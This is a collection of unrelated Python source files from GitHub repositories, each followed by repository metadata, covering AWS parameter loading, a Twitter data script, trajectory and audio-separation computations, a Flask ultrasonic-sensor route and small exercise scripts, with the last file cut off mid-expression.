from boto3.exceptions import Boto3Error
from botocore.exceptions import BotoCoreError, ClientError
from .exceptions import ParameterNotFoundException
_ssm_client = boto3.client(service_name='ssm')
def load_parameters(lookup_dict: dict, allow_invalid=True) -> dict:
"""
Loads each parameter defined in the lookup_dict as env. variables.
The lookup_dict should look like this:
{
'/path/to/parameter1': 'PARAMETER_AS_ENV_VAR_1',
'/path/to/parameter2': 'PARAMETER_AS_ENV_VAR_2',
...
'/path/to/parameterN': 'PARAMETER_AS_ENV_VAR_N',
}
The values (Env. variables names) could be anything you want.
It returns the loaded parameters for debugging purposes
"""
paginated_keys = (list(lookup_dict.keys())[i:i+10] for i in range(0, len(lookup_dict), 10))
parameters_ps = []
invalid_parameters = []
for keys in paginated_keys:
parameters_page = _ssm_client.get_parameters(Names=keys, WithDecryption=True)
parameters_ps += parameters_page['Parameters']
invalid_parameters += parameters_page['InvalidParameters']
if invalid_parameters and not allow_invalid:
raise ParameterNotFoundException(invalid_parameters)
parameters_ps = {param['Name']: param['Value'] for param in parameters_ps}
# Override configuration for requested keys
for key in parameters_ps:
if isinstance(lookup_dict[key], (tuple, list)):
setting_name, cast = lookup_dict[key]
os.environ[setting_name] = cast(parameters_ps[key])
elif isinstance(lookup_dict[key], str):
os.environ[lookup_dict[key]] = parameters_ps[key]
return parameters_ps
def load_path(*paths: Union[Iterable[str], str]) -> dict:
"""
Loads each parameter behind `paths` recursively as env. variables.
It returns the loaded parameters for debugging purposes
"""
all_parameters = {}
for path in paths:
parameters_page = _ssm_client.get_parameters_by_path(Path=path, Recursive=True)
parameters_ps = parameters_page['Parameters']
while parameters_page.get('NextToken'):
parameters_page = _ssm_client.get_parameters_by_path(Path=path, Recursive=True, NextToken=parameters_page.get('NextToken'))
parameters_ps += parameters_page['Parameters']
parameters_ps = {param['Name']: param['Value'] for param in parameters_ps}
all_parameters.update(**parameters_ps)
# Override configuration for requested keys
for key in parameters_ps:
os.environ[key.strip('/')
.replace('/', '_')
.replace('-', '_')
.upper()
] = parameters_ps[key]
return all_parameters
class DynamicParameter(object):
@property
def _value(self):
try:
parameter_page = _ssm_client.get_parameter(Name=self.key, WithDecryption=True)
except (ClientError, Boto3Error, BotoCoreError):
if self.fail_on_boto_error:
raise
else:
return ''
else:
return parameter_page['Parameter']['Value']
def __init__(self, key, fail_on_boto_error=True, *args, **kwargs):
super().__init__()
self.key = key
self.fail_on_boto_error = fail_on_boto_error
def __eq__(self, other):
return self._value == other
def __len__(self, other):
return len(self._value)
def __add__(self, other):
return self._value + other
def __radd__(self, other):
return other + self._value
def __unicode__(self):
return str(self._value)
def __str__(self):
return str.__str__(self._value)
def __repr__(self):
return str.__repr__(self._value)
| jiss2891/awstanding | src/awstanding/parameter_store.py | parameter_store.py | py | 4,272 | python | en | code | 13 | github-code | 36 |
9135179001 | from TWITOFF.twitter import *
DB.drop_all()
DB.create_all()
twitter_user = TWITTER.get_user('elonmusk')
tweets = twitter_user.timeline(count=200, exclude_replies=True, include_rts=False, tweet_mode='extended')
db_user = User(id=twitter_user.id, name=twitter_user.screen_name, newest_tweet_id=tweets[0].id)
for tweet in tweets:
embedding = BASILICA.embed_sentence(tweet.full_text,model='twitter')
db_tweet = Tweet(id=tweet.id, text=tweet.full_text[:500], embedding=embedding)
DB.session.add(db_tweet)
db_user.tweets.append(db_tweet)
DB.session.add(db_user)
DB.session.commit()
| Tclack88/Lambda | DS-3-3-Productization-and-Cloud/module2-consuming-data-from-an-api/add_musk.py | add_musk.py | py | 599 | python | en | code | 0 | github-code | 36 |
75312916265 | """
Usage:
trajectory.py <path> <start_time> <resolution> <x0> <y0> <z0> <t0> [<output_path>]
trajectory.py (-h | --help)
Arguments:
<path>
<start_time>
<resolution>
Options:
-h --help
Show this screen.
"""
import datetime
import warnings
import numpy as np
from twinotter.util.scripting import parse_docopt_arguments
from pylagranto import caltra
from pylagranto.datasets import MetUMStaggeredGrid
from moisture_tracers import grey_zone_forecast
trajectory_filename = "{start_time}_{resolution}_{x0}E_{y0}N_{z0}{units}_" \
"T+{lead_time:02d}.pkl"
# Inner-domain centre: x0=302.5, y0=13.5, t0=48
# HALO: x0=302.283, y0=13.3
# Ron Brown (2nd Feb): x0=305.5, y0=13.9
# 24th Jan Case study:
# x0=302.5, y0=11.75, t0=T+24h
# x0=310.0, y0=15.0, t0=T+48h
def _command_line_interface(path, start_time, resolution, x0, y0, z0, t0, output_path="./"):
forecast = grey_zone_forecast(
path, start_time, resolution=resolution, grid=None, lead_times=range(1, 48 + 1)
)
traout = calculate_trajectory(
forecast, float(x0), float(y0), float(z0), int(t0), "height_above_reference_ellipsoid"
)
traout.save(
output_path + trajectory_filename.format(
start_time=forecast.start_time.strftime("%Y%m%d"),
resolution=resolution,
x0=format_float_for_file(x0),
y0=format_float_for_file(y0),
z0=format_float_for_file(z0),
t0=t0,
units="m",
)
)
def calculate_trajectory(forecast, x0, y0, z0, t0, zcoord):
levels = (zcoord, [z0])
trainp = np.array([[x0, y0, z0]])
times = list(forecast._loader.files)
datasource = MetUMStaggeredGrid(forecast._loader.files, levels=levels)
time_traj = forecast.start_time + datetime.timedelta(hours=t0)
if time_traj == times[0]:
traout = caltra.caltra(
trainp, times, datasource, tracers=["x_wind", "y_wind"]
)
elif time_traj == times[-1]:
traout = caltra.caltra(
trainp, times, datasource, fbflag=-1, tracers=["x_wind", "y_wind"]
)
else:
times_fwd = [time for time in times if time <= time_traj]
traout_fwd = caltra.caltra(
trainp, times_fwd, datasource, tracers=["x_wind", "y_wind"]
)
times_bck = [time for time in times if time >= time_traj]
traout_bck = caltra.caltra(
trainp, times_bck, datasource, fbflag=-1, tracers=["x_wind", "y_wind"]
)
traout = traout_bck + traout_fwd
return traout
def format_float_for_file(x):
# Replace decimal point with a p (copying what was done for the UM files)
return str(x).replace(".", "p")
if __name__ == "__main__":
warnings.filterwarnings("ignore")
parse_docopt_arguments(_command_line_interface, __doc__)
| leosaffin/moisture_tracers | moisture_tracers/trajectory.py | trajectory.py | py | 2,859 | python | en | code | 0 | github-code | 36 |
70141671463 | def read_file(filename):
file = open(filename)
content = []
for word in file.readlines():
content.append(word.strip())
return set(content)
WORDBANK = read_file("wordbank.txt")
PREV_ANSWERS = read_file("prev_answers.txt")
POSS_ANSWERS = read_file("poss_answers.txt") | cezar-r/wordle_bot | src/words.py | words.py | py | 273 | python | en | code | 0 | github-code | 36 |
36386993279 | #!/usr/bin/env python3
from ietf.sql.rfc import Rfc
def query_rfc_by_keyword(Session, search_terms):
"""Return a query that, if run, would return RFCs with the keywords in
`keywords`.
The matching on is case-insensitive.
"""
# Assemble a query for each name
queries = [] # Empty list to store queries
for term in search_terms:
term = term.lower() # Convert to lowercase
queries.append(Session.query(Rfc).filter(Rfc.keywords.any(word=term)))
# Build a query of intersections
query_to_run = queries[0] # Assign first query
for query in queries[1:]: # Start at second element in list
query_to_run = query_to_run.intersect(query)
# Return the built query
return query_to_run
| lafrenierejm/ietf-cli | ietf/utility/query_keyword.py | query_keyword.py | py | 750 | python | en | code | 0 | github-code | 36 |
24788697819 | """
N×M 크기의 공간에 아기 상어 여러 마리가 있다. 공간은 1×1 크기의 정사각형 칸으로 나누어져 있다. 한 칸에는 아기 상어가 최대 1마리 존재한다.
어떤 칸의 안전 거리는 그 칸과 가장 거리가 가까운 아기 상어와의 거리이다. 두 칸의 거리는 하나의 칸에서 다른 칸으로 가기 위해서 지나야 하는 칸의 수이고, 이동은 인접한 8방향(대각선 포함)이 가능하다.
안전 거리가 가장 큰 칸을 구해보자.
"""
import sys
from collections import deque
N, M = list(map(int, sys.stdin.readline().strip().split()))
blocks = [[0] * M for _ in range(N)] # blocks
dir = [(0, -1), (-1, -1), (-1, 0), (-1, 1), (0, 1), (1, 1), (1, 0), (1, -1)]
for i in range(N):
blocks[i] = list(map(int, sys.stdin.readline().strip().split()))
def out_of_range(y,x):
return y < 0 or x < 0 or y >= N or x >= M
def solve():
max_val = float("-inf")
for i in range(N):
for j in range(M):
if blocks[i][j] == 0:
# bfs 시작
q = deque()
visited = set()
q.append((i,j, 0))
visited.add((i,j))
dist = 0
while q:
row, col, distance = q.popleft()
# print(row, col, distance)
if blocks[row][col] == 1:
dist = distance
break
for idx in range(8):
next_r, next_c = row + dir[idx][0], col + dir[idx][1]
if out_of_range(next_r, next_c) or (next_r, next_c) in visited:# or (next_r, next_c) in did_shark_test:
continue
q.append((next_r, next_c, distance + 1))
visited.add((next_r,next_c))
max_val = max(max_val, dist)
return max_val
def main():
print(solve())
main() | inhyeokJeon/AALGGO | Python/baekjoon/17086_baby_shark_2.py | 17086_baby_shark_2.py | py | 1,975 | python | ko | code | 0 | github-code | 36 |
25946901690 | #=======================================================
# lm35_slave.py : ADRS2040U PICO HAT Test Program
# 2022.09.14 V0.0 New Create
# 2022.10.26 V1.0 for ADRS2040U Ver 1.0
#=======================================================
import utime
import time
from machine import mem32,Pin
from i2cSlave import i2c_slave
unit = 0.005035477
# led pin config
led = Pin(25, Pin.OUT) # GP25を出力モードに設定
# led off
led.value(0)
# ADC on
lm35 = machine.ADC(0) # ADC0にLM35を接続
# i2c as slave
rp_i2c = i2c_slave(0, sda = 0, scl = 1, slaveAddress = 0x41)
rp_i2c.putWord(0) # dummy write for bus lock
while True:
cmd = 0
val = 0
temp = lm35.read_u16() # read ADC
if rp_i2c.any():
cmd = rp_i2c.get()
if cmd == 0x10 :
while not rp_i2c.anyRead():
pass
rp_i2c.putWord(temp)
#print('Temp:', temp * unit)
elif cmd == 0x20 :
val = rp_i2c.getWord()
#print('val :', val)
if val == 0 :
led.value(0)
elif val == 1 :
led.value(1)
| bit-trade-one/ADRS2040U | Sample/ADRS2040U_SampleSource/main.py | main.py | py | 1,189 | python | en | code | 1 | github-code | 36 |
75263426665 | """
@Time : 30/03/2023
@Author : qinghua
@Software: PyCharm
@File : process_data.py
"""
import os.path
import pickle
import lgsvl
import pandas as pd
import json
from config import Config
from tqdm import tqdm
"""Processing deep scenario data"""
def get_ds_data(runner):
"""pair paths of scenarios and scenario attributes"""
scene_attr_path_pairs = []
for root, dirs, files in os.walk(Config.scenario_dir):
depth = root.count(os.path.sep)
if depth == 4:
scenario_dirs = sorted([os.path.join(root, name) for name in os.listdir(root) if not name.endswith(".csv")])
attribute_fnames = sorted([os.path.join(root, name) for name in os.listdir(root) if name.endswith(".csv")])
scene_attr_path_pairs += list(zip(scenario_dirs, attribute_fnames))
"""
pair contents of scenarios and scenario attributes by each run
Output Example:
[
# run 0
[
# timestep 0
(
# variables
[1.2,2.1,...]
# attribute
{"ttc":xxx,"tto":xxx}
)
# timestep 1
....
]
# run 1
....
]
"""
print(scene_attr_path_pairs)
greedy_pairs = [(scene_dir, attr_path) for scene_dir, attr_path in scene_attr_path_pairs if
"greedy-strategy" in scene_dir]
random_pairs = [(scene_dir, attr_path) for scene_dir, attr_path in scene_attr_path_pairs if
"random-strategy" in scene_dir]
rl_pairs = [(scene_dir, attr_path) for scene_dir, attr_path in scene_attr_path_pairs if
"rl_based-strategy" in scene_dir]
dto_pairs = [(scene_dir, attr_path) for scene_dir, attr_path in scene_attr_path_pairs if
"reward-dto" in scene_dir]
jerk_pairs = [(scene_dir, attr_path) for scene_dir, attr_path in scene_attr_path_pairs if
"reward-jerk" in scene_dir]
ttc_pairs = [(scene_dir, attr_path) for scene_dir, attr_path in scene_attr_path_pairs if
"reward-ttc" in scene_dir]
greedy_ttc_pairs = [(scene_dir, attr_path) for scene_dir, attr_path in scene_attr_path_pairs if
"greedy-strategy" in scene_dir and "reward-ttc" in scene_dir]
random_ttc_pairs = [(scene_dir, attr_path) for scene_dir, attr_path in scene_attr_path_pairs if
"random-strategy" in scene_dir and "reward-ttc" in scene_dir]
rl_ttc_pairs = [(scene_dir, attr_path) for scene_dir, attr_path in scene_attr_path_pairs if
"rl_based-strategy" in scene_dir and "reward-ttc" in scene_dir]
r1_ttc_pairs = [(scene_dir, attr_path) for scene_dir, attr_path in scene_attr_path_pairs if
"road1" in scene_dir and "reward-ttc" in scene_dir]
r2_ttc_pairs = [(scene_dir, attr_path) for scene_dir, attr_path in scene_attr_path_pairs if
"road2" in scene_dir and "reward-ttc" in scene_dir]
r3_ttc_pairs = [(scene_dir, attr_path) for scene_dir, attr_path in scene_attr_path_pairs if
"road3" in scene_dir and "reward-ttc" in scene_dir]
r4_ttc_pairs = [(scene_dir, attr_path) for scene_dir, attr_path in scene_attr_path_pairs if
"road4" in scene_dir and "reward-ttc" in scene_dir]
all_runs = get_all_runs(scene_attr_path_pairs)
greedy_runs = get_all_runs(greedy_pairs)
random_runs = get_all_runs(random_pairs)
rl_runs = get_all_runs(rl_pairs)
dto_runs = get_all_runs(dto_pairs)
jerk_runs = get_all_runs(jerk_pairs)
ttc_runs = get_all_runs(ttc_pairs)
greedy_ttc_runs = get_all_runs(greedy_ttc_pairs)
random_ttc_runs = get_all_runs(random_ttc_pairs)
rl_ttc_runs = get_all_runs(rl_ttc_pairs)
r1_ttc_runs = get_all_runs(r1_ttc_pairs)
r2_ttc_runs = get_all_runs(r2_ttc_pairs)
r3_ttc_runs = get_all_runs(r3_ttc_pairs)
r4_ttc_runs = get_all_runs(r4_ttc_pairs)
return all_runs, greedy_runs, random_runs, rl_runs, dto_runs, jerk_runs, ttc_runs, greedy_ttc_runs, random_ttc_runs, rl_ttc_runs, r1_ttc_runs, r2_ttc_runs, r3_ttc_runs, r4_ttc_runs
def get_all_runs(scene_attr_path_pairs):
all_runs = []
clean_key = lambda k: k.replace("Attribute[", "").replace("]", "")
for scene_dir, attr_path in tqdm(scene_attr_path_pairs):
runs = [[] for _ in range(20)]
# get scenario attributes
attr_pdf = pd.read_csv(attr_path)
for row_id, row in attr_pdf.iterrows():
run_id = int(row["Execution"])
scene_fname = row["ScenarioID"] + ".deepscenario"
attrs = row.to_dict()
attrs = {clean_key(k): v for k, v in attrs.items()}
runner.load_scenario_file(os.path.join(scene_dir, scene_fname))
for i in range(1, 7):
timeframe = runner.get_scene_by_timestep(timestep=i)
timeframe = json.loads(timeframe)
runs[run_id].append([timeframe, attrs])
all_runs += runs
return all_runs
class Vocab:
def __init__(self):
super(Vocab, self).__init__()
self.id2str = []
self.str2id = {}
def add_if_not_exist(self, s):
if s not in self.str2id:
self.str2id[s] = len(self.id2str)
self.id2str.append(s)
def tokenize(self, s):
return self.str2id[s]
def size(self):
return len(self.id2str)
def build_vocab(str_list):
vocab = Vocab()
for s in str_list:
vocab.add_if_not_exist(s)
return vocab
"""Process elevator data"""
def get_ele_passenger_profiles(fname):
"""
Arrival Time; Arrival Floor; Destination Floor; Mass; Capacity;Loading time; Unloading time;Placeholder
:param fname:
:return:
"""
colnames = ["arrival_time", "arrival_floor", "destination_floor", "mass", "capacity", "loading_time",
"unloading_time", "placeholder"]
pdf = pd.read_csv(fname, header=None, names=colnames, index_col=False)
pdf = pdf[colnames[:-1]] # remove last column
pdf["arrival_time"] = pdf["arrival_time"].astype("float")
pdf["arrival_floor"] = pdf["arrival_floor"].astype("int")
pdf["destination_floor"] = pdf["destination_floor"].astype("int")
return pdf
def get_ele_simulator_result(fname):
"""
Document;Passenger;Source;Destination;ArrivalTime;LiftArrivalTime;DestinationArrivalTime
"""
colnames = ["document", "id", "arrival_floor", "destination_floor", "arrival_time", "lift_arrival_time",
"lift_destination_time"]
pdf = pd.read_csv(fname, names=colnames, delimiter=";", skiprows=1)
pdf = pdf[colnames[2:-1]]
pdf["arrival_time"] = pdf["arrival_time"].astype("float")
pdf["arrival_floor"] = pdf["arrival_floor"].astype("int")
pdf["destination_floor"] = pdf["destination_floor"].astype("int")
return pdf
def get_ele_data(dispatcher, peak_type):
"""
:param dispatcher: list of integers
:param peak_type: ["lunchpeak","uppeak"]
:return: joined data of profiles and results
"""
print(dispatcher, peak_type)
peak_type = "LunchPeak" if "lunch" in peak_type.lower() else "Uppeak"
profile_dir = Config.lunchpeak_profile_dir if peak_type == "LunchPeak" else Config.uppeak_profile_dir
dispatcher_name = "Dispatch_00" if dispatcher == 0 else "Dispatch_M{:2d}".format(dispatcher)
result_dir = os.path.join(Config.result_dir, dispatcher_name)
if not os.path.exists(result_dir):
return False
result_pdfs = []
for i in range(10):
n_variable = "4" if peak_type == "LunchPeak" else "Four"
profile_fname = "{}_mass_capacity_loading_unloading(CIBSE-office-{}){}.txt".format(n_variable, peak_type, i)
result_fname = "{}_mass_capacity_loading_unloading(CIBSE-office-{}){}.csv".format(n_variable, peak_type, i)
profile_pdf = get_ele_passenger_profiles(os.path.join(profile_dir, profile_fname))
result_pdf = get_ele_simulator_result(os.path.join(result_dir, result_fname))
result_pdf = profile_pdf.merge(result_pdf, how="right",
on=["arrival_time", "arrival_floor", "destination_floor"])
result_pdfs.append(result_pdf)
result_pdf = pd.concat(result_pdfs)
result_fname = "Dispatcher_{:2d}_{}.pkl".format(dispatcher, peak_type)
pickle.dump(result_pdf,
open( os.path.join(Config.elevator_save_dir, result_fname),"wb")
)
return result_pdf
if __name__ == '__main__':
"""collect data by runs"""
# runner = lgsvl.scenariotoolset.ScenarioRunner()
# all_runs, greedy_runs, random_runs, rl_runs, dto_runs, jerk_runs, ttc_runs, greedy_ttc_runs, random_ttc_runs, rl_ttc_runs, r1_ttc_runs, r2_ttc_runs, r3_ttc_runs, r4_ttc_runs = get_ds_data(
# runner)
# pickle.dump(all_runs, open(Config.all_runs_pkl_path, "wb"))
# pickle.dump(greedy_runs, open(Config.greedy_runs_pkl_path, "wb"))
# pickle.dump(random_runs, open(Config.random_runs_pkl_path, "wb"))
# pickle.dump(rl_runs, open(Config.rl_runs_pkl_path, "wb"))
# pickle.dump(dto_runs, open(Config.dto_runs_pkl_path, "wb"))
# pickle.dump(jerk_runs, open(Config.jerk_runs_pkl_path, "wb"))
# pickle.dump(rl_runs, open(Config.rl_runs_pkl_path, "wb"))
# pickle.dump(random_ttc_runs, open(Config.random_ttc_runs_pkl_path, "wb"))
# pickle.dump(greedy_ttc_runs, open(Config.greedy_ttc_runs_pkl_path, "wb"))
# pickle.dump(rl_ttc_runs, open(Config.rl_ttc_runs_pkl_path, "wb"))
# pickle.dump(r1_ttc_runs, open(Config.r1_ttc_runs_pkl_path, "wb"))
# pickle.dump(r2_ttc_runs, open(Config.r2_ttc_runs_pkl_path, "wb"))
# pickle.dump(r3_ttc_runs, open(Config.r3_ttc_runs_pkl_path, "wb"))
# pickle.dump(r4_ttc_runs, open(Config.r4_ttc_runs_pkl_path, "wb"))
# process elevator data
ele_names = ["dispatch_00_lunchpeak", "dipatcher_00_uppeak"]
ele_names += ["dispatcher_{:02d}_lunchpeak_variant".format(i) for i in range(1, 100)]
ele_names += ["dispatcher_{:02d}_uppeak_variant".format(i) for i in range(1, 100)]
peak_types = ["lunchpeak", "uppeak"]
for i in range(100):
for peak_type in peak_types:
pdf = get_ele_data(i, peak_type)
| qhml/ppt | process_data.py | process_data.py | py | 10,320 | python | en | code | 0 | github-code | 36 |
1412530570 | from flask import Flask,render_template,flash,redirect,session,url_for,logging,request,Blueprint,json,session
from flask_json import FlaskJSON, JsonError, json_response, as_json
from smartiot.bin.config.db_config import mysql
from smartiot.routes.route_Permissions.userPermissions import getPermissions
import RPi.GPIO as GPIO # Import Raspberry Pi GPIO library
import time
iot_ultraSonic_bp = Blueprint(
'iot_ultra-sonic_bp',
__name__
)
#define led oin
led_pin = 7
@iot_ultraSonic_bp.route("/ultra",methods=['POST'])
def ultraSonic():
try:
content = request.get_json()
action = content['action']
userid = content['userId']
endpoint = content['endPoint']
except:
#response
return json_response(
message="Internal server error",
status = 500
)
permissions = getPermissions(userid,endpoint)
print(str(permissions))
if permissions is "granted":
print('granted')
if action == "measure":
#mysql
#execute query
sql ="INSERT INTO logs(info,value,dataType,deviceName,deviceId,userId) VALUES('',%s,%s,%s,'2',%s)"
#print(str(sql))
#get data from sensor
distance = measure()
d=round(distance ,2)
distance_cm = format(d)
# print( "Distance : {0} cm".distance_cm)
#create a cursur
cur = mysql.connection.cursor()
result = cur.execute(sql,(distance_cm,"proximity",endpoint,userid))
#commit to Datebase
mysql.connection.commit()
return json_response(
distance = distance,
message = "Distance in cm",
status =200
)
if action == "":#other fuctions
#mysql
#execute query
sql ="INSERT INTO logs(info,value,dataType,deviceName,deviceId,userId) VALUES('',%s,%s,%s,'1',%s)"
print(str(sql))
#create a cursur
cur = mysql.connection.cursor()
result = cur.execute(sql,("on","state",endpoint,userid))
#commit to Datebase
mysql.connection.commit()
#close connection
cur.close()
GPIO.cleanup()
return
print('granted')
if permissions is "denied":
#mysql
#execute query
sql ="INSERT INTO logs(info,value,dataType,deviceName,deviceId,userId) VALUES(%s,'','',%s,'1',%s)"
print(str(sql))
#create a cursur
cur = mysql.connection.cursor()
result = cur.execute(sql,("Permission Denied",endpoint,userid))
#commit to Datebase
mysql.connection.commit()
#close connection
cur.close()
#response
return json_response(
distance = "",
message="Permission denied for this user",
status = 403
)
print('denied')
# measure distance
def measure():
GPIO.setmode(GPIO.BCM)
TRIG = 4
ECHO = 18
GPIO.setup(TRIG , GPIO.OUT)
GPIO.setup(ECHO , GPIO.IN)
GPIO.output(TRIG , True)
time.sleep(0.0001)
GPIO.output(TRIG , False)
while GPIO.input(ECHO) == False:
start = time.time();
while GPIO.input(ECHO) == True:
end = time.time();
sig_time = end-start
#cm:
dis = sig_time/0.000058
print('Dist : {} cm'.format(dis))
GPIO.cleanup()
return dis
def measure_average():
# This function takes 3 measurements and
# returns the average.
distance1=measure()
time.sleep(0.1)
distance2=measure()
time.sleep(0.1)
distance3=measure()
distance = distance1 + distance2 + distance3
distance_avg = distance / 3
return distance_avg
| Singh-Kiran-P/smart-iot-python-api | smartiot/routes/iot/ultraSonic.py | ultraSonic.py | py | 3,894 | python | en | code | 0 | github-code | 36 |
15741816314 | from vector_class import Vectors
import math as m
def main():
#ask user for components of the first vector
component_1=input("The first component of the vector is:")
component_2=input("The second component of the vector is:")
component_3=input("The third component of the vector is:")
vector_1=[component_1,component_2,component_3]
print("the first vector is"+str(vector_1))
#ask user for components of the second vector
component2_1=input("The first component of the second vector is:")
component2_2=input("The second component of the second vector is:")
component2_3=input("The third component of the second vector is:")
vector_2=[component2_1,component2_2,component2_3]
print("the second vector is"+str(vector_2))
#ask user for a scalar scalar multiple, c
c=input("my scalar multiple is:")
#initialise the first vector as an instance of the class Vectors
instance_vector=Vectors(vector_1)
#use mag property of vectors to compute the magnitude of the first vector
magnitude=instance_vector.mag
print("the magnitude of the first vector is:"+str(magnitude))
#use mag2 property of vectors to compute the squared magnitude of the first vector
magnitude2=instance_vector.mag2
print("the squared magnitude of the first vector is:"+str(magnitude2))
#use class method to compute dot product of the two vectors
dot_product=instance_vector.dot_prod(vector_2)
print("the dot product of the two vectors is:"+str(dot_product))
#find scalar multiple of first vector
multiple=instance_vector.scalar_multiple(c)
print("the scalar multiple of the first vector is:"+str(multiple))
#use class method "cross" to compute cross product of the two vectors
print("the cross product of the two vectors is:"+str(instance_vector.cross(vector_2)))
#use class method "sum" to add the two vectors
print("the sum of the two vectors is:"+str(instance_vector.sum(vector_2)))
#use class method "diff" the subtract the first vector from the second
print("the second vector minus the first is:"+str(instance_vector.diff(vector_2)))
#check whether the two vectors are the same
print("are the two vectors the same?"+str(instance_vector.same(vector_2)))
main()
| brendan-martin/CompMod-excercise_1 | exercise_1/main2.py | main2.py | py | 2,284 | python | en | code | 0 | github-code | 36 |
74901731943 | import time
import numpy as np
from librosa import load, stft, istft, resample
from librosa.output import write_wav
from sklearn.cluster import MiniBatchKMeans, FeatureAgglomeration
from sklearn import datasets
import warnings
# import matplotlib.pyplot as plt
import mir_eval
import corpus
from scipy.io import loadmat
class beta_NTF(object):
def __init__(self, W, H, X, A, sigma_b, Q, V, K_partition,
epochs=20, debug=False, beta=0):
super(beta_NTF, self).__init__()
# np.seterr(all='warn')
#
# warnings.filterwarnings('error')
self._epochs = epochs
self._debug = debug
self._V = V
self._W = W
self._H = H
self._A = A
self._Q = Q
self._sigma_b = sigma_b
self._Xb = X
self._K_partition = K_partition
self.I, self.F, self.T = X.shape
self.K = W.shape[1]
self.J = Q.shape[0]
self.IJ = self.I*self.J
self.O = np.ones((1,self.T))
self.source_ind = []
for j in range(self.J):
self.source_ind.append(np.arange(0,self.K/self.J)+(j*(self.K/self.J)))
def train(self):
for epoch in range(self._epochs):
# print(epoch)
sigma_ss = np.zeros((self.I,self.J,self.F,self.T))
for i in range(self.I):
sigma_ss[i,:,:,:] = self._V[:,:,:]
sigma_ss = sigma_ss.reshape((self.IJ, self.F, self.T))
sigma_x = np.zeros((self.I,self.I,self.F,self.T), dtype=complex)
inv_sigma_x = np.zeros((self.I,self.I,self.F,self.T), dtype=complex)
Gs = np.zeros((self.I,self.IJ,self.F,self.T), dtype=complex)
s_hat = np.zeros((self.IJ, self.F, self.T), dtype=complex)
bar_Rxs = np.zeros((self.I, self.IJ, self.F, self.T), dtype=complex)
bar_Rss_full = np.zeros((self.IJ, self.IJ, self.F, self.T), dtype=complex)
bar_Rxx = np.zeros((self.I, self.I, self.F, self.T), dtype=complex)
bar_P = np.zeros((self.J, self.F, self.T))
bar_A = np.zeros((self.I, self.F, self.K))
Vc = np.zeros((self.F, self.T, self.K))
W_prev = self._W
H_prev = self._H
A_prev = self._A
sig_b_prev = self._sigma_b
sigma_x[0,0,:,:] = np.matmul(self._sigma_b, self.O)
sigma_x[1,1,:,:] = np.matmul(self._sigma_b, self.O)
for ij in range(self.IJ):
sigma_x[0,0,:,:] = sigma_x[0,0,:,:] + np.multiply(np.matmul(np.power(np.abs(self._A[0,ij,:].reshape((self.F, 1))), 2), self.O), sigma_ss[ij,:,:])
sigma_x[0,1,:,:] = sigma_x[0,1,:,:] + np.multiply(np.matmul(np.multiply(self._A[0,ij,:], np.conj(self._A[1,ij,:])).reshape((self.F, 1)), self.O), sigma_ss[ij,:,:])
sigma_x[1,0,:,:] = np.conj(sigma_x[0,1,:,:])
sigma_x[1,1,:,:] = sigma_x[1,1,:,:] + np.multiply(np.matmul(np.power(np.abs(self._A[1,ij,:].reshape((self.F, 1))), 2), self.O), sigma_ss[ij,:,:])
try:
det_sigma_x = np.multiply(sigma_x[0, 0, :, :], sigma_x[1,1,:,:]) - np.power(np.abs(sigma_x[0,1,:,:]),2)
inv_sigma_x [0,0,:,:] = np.divide(sigma_x[1,1,:,:], det_sigma_x)
inv_sigma_x [0,1,:,:] = np.negative(np.divide(sigma_x[0,1,:,:], det_sigma_x))
inv_sigma_x [1,0,:,:] = np.conj(inv_sigma_x [0,1,:,:])
inv_sigma_x [1,1,:,:] = np.divide(sigma_x[0,0,:,:], det_sigma_x)
except Warning:
scale = np.sum(self._W, axis=0)
print(scale)
# print(self._H)
print(det_sigma_x)
#correct till here
for ij in range(self.IJ):
Gs[0,ij,:,:] = np.multiply(np.multiply(np.matmul(np.conj(self._A[0,ij,:].reshape((self.F, 1))), self.O), inv_sigma_x [0,0,:,:]) + \
np.multiply(np.matmul(np.conj(self._A[1,ij,:].reshape((self.F, 1))), self.O), inv_sigma_x [1,0,:,:]),
sigma_ss[ij,:,:])
Gs[1,ij,:,:] = np.multiply(np.multiply(np.matmul(np.conj(self._A[0,ij,:].reshape((self.F, 1))), self.O), inv_sigma_x [0,1,:,:]) + \
np.multiply(np.matmul(np.conj(self._A[1,ij,:].reshape((self.F, 1))), self.O), inv_sigma_x [1,1,:,:]),
sigma_ss[ij,:,:])
s_hat[ij,:,:] = np.multiply(Gs[0,ij,:,:], self._Xb[0,:,:]) + np.multiply(Gs[1,ij,:,:], self._Xb[1,:,:])
bar_Rxs[0, ij, :, :] = np.multiply(self._Xb[0,:,:], np.conj(s_hat[ij,:,:]))
bar_Rxs[1, ij, :, :] = np.multiply(self._Xb[1,:,:], np.conj(s_hat[ij,:,:]))
# correct till here
for j1 in range(self.IJ):
for j2 in range(self.IJ):
bar_Rss_full[j1, j2, :, :] = np.multiply(s_hat[j1, :, :], np.conj(s_hat[j2, :, :])) - \
np.multiply(np.multiply(Gs[0, j1, :, :], np.matmul(self._A[0,j2,:].reshape((self.F, 1)), self.O)) + \
np.multiply(Gs[1, j1, :, :], np.matmul(self._A[1,j2,:].reshape((self.F, 1)), self.O)),
sigma_ss[j2,:,:])
bar_Rss_full[j1,j1,:,:] = bar_Rss_full[j1,j1,:,:] + sigma_ss[j1,:,:]
# need to check bar_Rss_full calculation very carefully there is a tiny error
for j in range(self.J):
start_index = (j*self.I)
end_index = (j+1) * self.I
temp_P = np.zeros((self.I, self.F, self.T))
P_i = 0
for i in range(start_index, end_index):
temp_P[P_i, :, :] = np.real(bar_Rss_full[i,i,:,:])
P_i = P_i + 1
bar_P[j, :, :] = np.mean(temp_P, axis=0)
# correct till here
bar_Rxx[0,0,:,:] = np.power(np.abs(self._Xb[0,:,:]),2)
bar_Rxx[0,1,:,:] = np.multiply(self._Xb[0,:,:], np.conj(self._Xb[1,:,:]))
bar_Rxx[1,0,:,:] = np.conj(bar_Rxx[0,1,:,:])
bar_Rxx[1,1,:,:] = np.power(np.abs(self._Xb[1,:,:]),2)
# outers are correct middle has a small error
for f in range(self.F):
self._A[:,:,f] = np.matmul(np.mean(bar_Rxs[:,:,f,:], axis=2),np.linalg.inv(np.mean(bar_Rss_full[:,:,f,:], axis=2)))
for f in range(self.F):
self._sigma_b[f] = 0.5 * np.real(np.trace(np.mean(bar_Rxx[:,:,f,:],axis=2) - \
np.matmul(self._A[:,:,f], np.conj(np.transpose(np.mean(bar_Rxs[:,:,f,:],axis=2)))) - \
np.matmul(np.mean(bar_Rxs[:,:,f,:],axis=2), np.conj(np.transpose(self._A[:,:,f]))) + \
np.matmul(np.matmul(self._A[:,:,f], np.mean(bar_Rss_full[:,:,f,:],axis=2)),
